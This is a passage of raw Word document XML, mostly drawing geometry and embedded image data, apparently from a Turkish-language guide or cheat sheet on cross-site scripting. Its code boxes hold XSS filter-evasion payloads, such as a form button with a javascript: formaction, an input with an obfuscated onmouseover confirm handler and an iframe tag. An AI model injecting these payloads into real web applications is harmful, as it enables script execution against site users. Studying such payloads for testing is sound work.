                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="71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632 584"/>
                            <a:gd name="T3" fmla="*/ 632 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 632 584"/>
                            <a:gd name="T7" fmla="*/ 632 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 631 584"/>
                            <a:gd name="T11" fmla="*/ 631 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 611 584"/>
                            <a:gd name="T15" fmla="*/ 611 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 605 584"/>
                            <a:gd name="T19" fmla="*/ 605 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 584 584"/>
                            <a:gd name="T23" fmla="*/ 584 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 584 584"/>
                            <a:gd name="T27" fmla="*/ 584 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 608 584"/>
                            <a:gd name="T31" fmla="*/ 608 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 611 584"/>
                            <a:gd name="T35" fmla="*/ 611 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 632 584"/>
                            <a:gd name="T39" fmla="*/ 632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7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4A824" id="Freeform 72" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:29.2pt;width:2.45pt;height:2.45pt;z-index:-1546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" path="m28,48r-7,l18,47,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,401320;13335,401320;11430,400685;0,387985;0,384175;13335,370840;17780,370840;31115,386080;31115,387985;17780,40132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5459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324485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3148330" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="68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8330" cy="116205"/>
                          <a:chOff x="1930" y="511"/>
                          <a:chExt cx="4958" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="69" name="Freeform 71"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="510"/>
                            <a:ext cx="4958" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6866 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 4958"/>
                              <a:gd name="T2" fmla="+- 0 693 511"/>
                              <a:gd name="T3" fmla="*/ 693 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 4958"/>
                              <a:gd name="T6" fmla="+- 0 693 511"/>
                              <a:gd name="T7" fmla="*/ 693 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 4958"/>
                              <a:gd name="T10" fmla="+- 0 692 511"/>
                              <a:gd name="T11" fmla="*/ 692 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 4958"/>
                              <a:gd name="T14" fmla="+- 0 672 511"/>
                              <a:gd name="T15" fmla="*/ 672 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 4958"/>
                              <a:gd name="T18" fmla="+- 0 669 511"/>
                              <a:gd name="T19" fmla="*/ 669 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 4958"/>
                              <a:gd name="T22" fmla="+- 0 532 511"/>
                              <a:gd name="T23" fmla="*/ 532 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 4958"/>
                              <a:gd name="T26" fmla="+- 0 511 511"/>
                              <a:gd name="T27" fmla="*/ 511 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6866 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 4958"/>
                              <a:gd name="T30" fmla="+- 0 511 511"/>
                              <a:gd name="T31" fmla="*/ 511 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6887 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 4958"/>
                              <a:gd name="T34" fmla="+- 0 532 511"/>
                              <a:gd name="T35" fmla="*/ 532 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6887 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 4958"/>
                              <a:gd name="T38" fmla="+- 0 672 511"/>
                              <a:gd name="T39" fmla="*/ 672 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6870 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 4958"/>
                              <a:gd name="T42" fmla="+- 0 692 511"/>
                              <a:gd name="T43" fmla="*/ 692 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6866 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 4958"/>
                              <a:gd name="T46" fmla="+- 0 693 511"/>
                              <a:gd name="T47" fmla="*/ 693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958" h="183">
                                <a:moveTo>
                                  <a:pt x="493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936" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4957" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4957" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4940" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493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10"/>
                            <a:ext cx="495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&lt;form&gt;&lt;button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12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formaction=javascript&amp;colon;alert(1)&gt;CLICKME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" o:spid="_x0000_s2253" style="position:absolute;margin-left:96.5pt;margin-top:25.55pt;width:247.9pt;height:9.15pt;z-index:-15461888;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,511" coordsize="4958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">
                <v:shape id="Freeform 71" o:spid="_x0000_s2254" style="position:absolute;left:1930;top:510;width:4958;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="495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j/RcUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74LfYXmCl1I3KvVPdJWoiD30YtpLb4/s&#10;Mwlm34bsGuO3dwsFj8PM/IZZbztTiZYaV1pWMB5FIIgzq0vOFfx8H98XIJxH1lhZJgUPcrDd9Htr&#10;jLW985na1OciQNjFqKDwvo6ldFlBBt3I1sTBu9jGoA+yyaVu8B7gppKTKJpJgyWHhQJr2heUXdOb&#10;UVDPf5P2ZD+S5GucHuybdqfpbqHUcNAlKxCeOv8K/7c/tYLZEv6+hB8gN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P9FxQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4936,182l21,182r-3,-1l,161r,-3l,21,21,,4936,r21,21l4957,161r-17,20l4936,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4936,693;21,693;18,692;0,672;0,669;0,532;21,511;4936,511;4957,532;4957,672;4940,692;4936,693" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 70" o:spid="_x0000_s2255" type="#_x0000_t202" style="position:absolute;left:1930;top:510;width:4958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ZHF8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uD5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5kcXwgAAANs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&lt;form&gt;&lt;button</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="12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formaction=javascript&amp;colon;alert(1)&gt;CLICKME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5510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594360</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="67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984 936"/>
                            <a:gd name="T3" fmla="*/ 984 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 984 936"/>
                            <a:gd name="T7" fmla="*/ 984 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 984 936"/>
                            <a:gd name="T11" fmla="*/ 984 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 963 936"/>
                            <a:gd name="T15" fmla="*/ 963 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 957 936"/>
                            <a:gd name="T19" fmla="*/ 957 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 936 936"/>
                            <a:gd name="T23" fmla="*/ 936 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 936 936"/>
                            <a:gd name="T27" fmla="*/ 936 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 960 936"/>
                            <a:gd name="T31" fmla="*/ 960 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 963 936"/>
                            <a:gd name="T35" fmla="*/ 963 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 984 936"/>
                            <a:gd name="T39" fmla="*/ 984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556727" id="Freeform 68" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:46.8pt;width:2.45pt;height:2.45pt;z-index:-1546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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,624840;13335,624840;11430,624840;0,611505;0,607695;13335,594360;17780,594360;31115,609600;31115,611505;17780,62484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5561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548005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3148330" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="64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8330" cy="116205"/>
                          <a:chOff x="1930" y="863"/>
                          <a:chExt cx="4958" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="65" name="Freeform 67"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="862"/>
                            <a:ext cx="4958" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6866 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 4958"/>
                              <a:gd name="T2" fmla="+- 0 1045 863"/>
                              <a:gd name="T3" fmla="*/ 1045 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 4958"/>
                              <a:gd name="T6" fmla="+- 0 1045 863"/>
                              <a:gd name="T7" fmla="*/ 1045 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 4958"/>
                              <a:gd name="T10" fmla="+- 0 1045 863"/>
                              <a:gd name="T11" fmla="*/ 1045 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 4958"/>
                              <a:gd name="T14" fmla="+- 0 1024 863"/>
                              <a:gd name="T15" fmla="*/ 1024 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 4958"/>
                              <a:gd name="T18" fmla="+- 0 1021 863"/>
                              <a:gd name="T19" fmla="*/ 1021 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 4958"/>
                              <a:gd name="T22" fmla="+- 0 884 863"/>
                              <a:gd name="T23" fmla="*/ 884 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 4958"/>
                              <a:gd name="T26" fmla="+- 0 863 863"/>
                              <a:gd name="T27" fmla="*/ 863 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6866 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 4958"/>
                              <a:gd name="T30" fmla="+- 0 863 863"/>
                              <a:gd name="T31" fmla="*/ 863 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6887 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 4958"/>
                              <a:gd name="T34" fmla="+- 0 884 863"/>
                              <a:gd name="T35" fmla="*/ 884 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6887 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 4958"/>
                              <a:gd name="T38" fmla="+- 0 1024 863"/>
                              <a:gd name="T39" fmla="*/ 1024 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6870 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 4958"/>
                              <a:gd name="T42" fmla="+- 0 1045 863"/>
                              <a:gd name="T43" fmla="*/ 1045 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6866 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 4958"/>
                              <a:gd name="T46" fmla="+- 0 1045 863"/>
                              <a:gd name="T47" fmla="*/ 104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958" h="183">
                                <a:moveTo>
                                  <a:pt x="493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4936" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4957" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4957" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4940" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493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862"/>
                            <a:ext cx="495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&lt;input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"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" o:spid="_x0000_s2256" style="position:absolute;margin-left:96.5pt;margin-top:43.15pt;width:247.9pt;height:9.15pt;z-index:-15460864;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,863" coordsize="4958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">
                <v:shape id="Freeform 67" o:spid="_x0000_s2257" style="position:absolute;left:1930;top:862;width:4958;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="495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X1QMUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCL6KbtGglukpsKXropakXb4/s&#10;axKafRt21yT9991CweMwM98wu8NoWtGT841lBekyAUFcWt1wpeDy+bbYgPABWWNrmRT8kIfDfjrZ&#10;YabtwB/UF6ESEcI+QwV1CF0mpS9rMuiXtiOO3pd1BkOUrpLa4RDhppWPSbKWBhuOCzV29FJT+V3c&#10;jILu+Zr3J7vK8/e0eLVz7U9Px41SD7Mx34IINIZ7+L991grWK/j7En+A3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RfVAxQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4936,182l21,182r-3,l,161r,-3l,21,21,,4936,r21,21l4957,161r-17,21l4936,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4936,1045;21,1045;18,1045;0,1024;0,1021;0,884;21,863;4936,863;4957,884;4957,1024;4940,1045;4936,1045" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 66" o:spid="_x0000_s2258" type="#_x0000_t202" style="position:absolute;left:1930;top:862;width:4958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rsJcQA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJ3pqNPQRNXUWkhUJBjPHQ4zP7&#10;TBazb9PsVuO/dwXB4zAz3zDz5WBbcabeG8cKJkkKgrhy2nCtYF9+vU1B+ICssXVMCq7kYbl4fZlj&#10;rt2FCzrvQi0ihH2OCpoQulxKXzVk0SeuI47e0fUWQ5R9LXWPlwi3rXxP00xaNBwXGuxo3VB12v1b&#10;BatfLj7N3+awLY6FKctZyj/ZSanxaFh9gAg0hGf40f7WCrIM7l/iD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a7CXEAAAA2w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&lt;input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"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5612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810260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="63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325 1276"/>
                            <a:gd name="T3" fmla="*/ 1325 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1325 1276"/>
                            <a:gd name="T7" fmla="*/ 1325 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1324 1276"/>
                            <a:gd name="T11" fmla="*/ 1324 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1304 1276"/>
                            <a:gd name="T15" fmla="*/ 1304 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1297 1276"/>
                            <a:gd name="T19" fmla="*/ 1297 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1276 1276"/>
                            <a:gd name="T23" fmla="*/ 1276 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1276 1276"/>
                            <a:gd name="T27" fmla="*/ 1276 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1300 1276"/>
                            <a:gd name="T31" fmla="*/ 1300 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1304 1276"/>
                            <a:gd name="T35" fmla="*/ 1304 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1325 1276"/>
                            <a:gd name="T39" fmla="*/ 1325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04307" id="Freeform 64" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:63.8pt;width:2.45pt;height:2.45pt;z-index:-1546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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,841375;13335,841375;11430,840740;0,828040;0,823595;13335,810260;17780,810260;31115,825500;31115,828040;17780,84137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5664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763905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="6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" cy="116205"/>
                          <a:chOff x="1930" y="1203"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="61" name="Freeform 63"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1203"/>
                            <a:ext cx="742" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2650 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 742"/>
                              <a:gd name="T2" fmla="+- 0 1385 1203"/>
                              <a:gd name="T3" fmla="*/ 1385 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 1385 1203"/>
                              <a:gd name="T7" fmla="*/ 1385 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 1385 1203"/>
                              <a:gd name="T11" fmla="*/ 1385 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 1364 1203"/>
                              <a:gd name="T15" fmla="*/ 1364 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 1361 1203"/>
                              <a:gd name="T19" fmla="*/ 1361 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 1224 1203"/>
                              <a:gd name="T23" fmla="*/ 1224 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 1203 1203"/>
                              <a:gd name="T27" fmla="*/ 1203 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 1203 1203"/>
                              <a:gd name="T31" fmla="*/ 1203 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 1224 1203"/>
                              <a:gd name="T35" fmla="*/ 1224 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 1364 1203"/>
                              <a:gd name="T39" fmla="*/ 1364 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 1385 1203"/>
                              <a:gd name="T43" fmla="*/ 1385 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 1385 1203"/>
                              <a:gd name="T47" fmla="*/ 1385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42" h="183">
                                <a:moveTo>
                                  <a:pt x="72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20" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="741" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="741" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="723" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="72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203"/>
                            <a:ext cx="74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sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;iframe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2259" style="position:absolute;margin-left:96.5pt;margin-top:60.15pt;width:37.1pt;height:9.15pt;z-index:-15459840;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1203" coordsize="74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">
                <v:shape id="Freeform 63" o:spid="_x0000_s2260" style="position:absolute;left:1930;top:1203;width:742;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="74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78ucIA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESP0YrCMBRE34X9h3AFX2RNug/ido0iC7Iqglj9gEtz&#10;ty02N6WJtf69EQQfh5k5w8yXva1FR62vHGtIJgoEce5MxYWG82n9OQPhA7LB2jFpuJOH5eJjMMfU&#10;uBsfqctCISKEfYoayhCaVEqfl2TRT1xDHL1/11oMUbaFNC3eItzW8kupqbRYcVwosaHfkvJLdrUa&#10;/rb72vdn3NgTfie7w0Xtu7HSejTsVz8gAvXhHX61N0bDNIHnl/g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3vy5wgAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,1385;21,1385;18,1385;0,1364;0,1361;0,1224;21,1203;720,1203;741,1224;741,1364;723,1385;720,1385" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 62" o:spid="_x0000_s2261" type="#_x0000_t202" style="position:absolute;left:1930;top:1203;width:74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qJs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kM7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HqJsMAAADb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sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;iframe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8"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:ind w:left="470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5231130" cy="116205"/>
                <wp:effectExtent l="6350" t="4445" r="1270" b="3175"/>
                <wp:docPr id="57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31130" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8238" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="58" name="Freeform 6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238" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8217 w 8238"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8238"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8238"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8238"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8238"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8238"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8238"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8217 w 8238"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8238 w 8238"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8238 w 8238"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8220 w 8238"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8217 w 8238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238" h="183">
                                <a:moveTo>
                                  <a:pt x="8217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217" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8238" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8238" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8220" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
